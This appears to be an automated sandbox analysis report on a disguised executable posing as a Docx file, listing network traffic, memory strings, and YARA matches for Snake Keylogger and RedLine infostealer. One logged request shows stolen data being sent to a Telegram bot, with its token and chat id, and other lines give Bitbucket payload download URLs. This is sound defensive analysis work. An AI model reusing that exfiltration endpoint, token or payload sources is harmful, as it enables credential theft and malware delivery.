          Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
          Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
          Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
          Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
          Source: unknown | HTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd1f4d1c06ddc3 | Host: api.telegram.org | Content-Length: 535 | Connection: Keep-Alive
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/)_
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.000000002090D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/dow
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.000000002089B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
          Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49715 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 52.217.32.148:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49758 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49782 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49799 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50080 version: TLS 1.2
          Source: Yara match File source: Process Memory Space: D.G Governor Istek,Docx.exe PID: 1560, type: MEMORYSTR

          System Summary

          Source: 4.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 13.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31d76478.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31d76478.5.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1d270f08.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1d270f08.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.3092b98e.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.3092b98e.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e32e790.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1e32e790.6.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31dae790.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31dae790.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.3092c896.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.3092c896.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.370d0000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.370d0000.8.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.Cneehezx.PIF.21496c78.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e2f6478.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1e2f6478.7.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31d76478.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31d76478.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.342cb98e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.342cb98e.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.30ca0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.30ca0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.330f0000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.330f0000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.30ca0000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.30ca0000.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 13.2.xzeheenC.pif.3092c896.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.3092c896.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 6.2.Cneehezx.PIF.21496c78.5.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.35556478.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.35556478.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.36aa0f08.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.36aa0f08.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.D.G Governor Istek,Docx.exe.21ab13d8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1d270000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1d270000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e2f5570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1e2f5570.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1f670000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1f670000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.3.xzeheenC.pif.2ed4e980.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.3.xzeheenC.pif.2ed4e980.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.342cc896.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.342cc896.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.36aa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.36aa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.30ca0f08.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.30ca0f08.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.330f0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.330f0000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 13.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.3558e790.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.3558e790.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.370d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.370d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31d75570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31d75570.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1d270000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1d270000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1ce5c896.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1ce5c896.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.36aa0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.36aa0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.Cneehezx.PIF.214d58a8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.342cc896.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.342cc896.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31dae790.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31dae790.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e2f5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 13.2.xzeheenC.pif.30ca0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.3.xzeheenC.pif.2ed4e980.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.3.xzeheenC.pif.2ed4e980.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.35555570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.3092b98e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31d75570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.36aa0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.35555570.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.342cb98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.3092b98e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.30ca0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e2f5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31d75570.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.36aa0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.342cb98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.35555570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.35556478.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.35555570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.35556478.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.D.G Governor Istek,Docx.exe.21a1c948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000009.00000002.3435325759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 0000000D.00000001.2421840333.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: 00000009.00000001.2342337171.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
          Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 0000000D.00000002.3435459349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
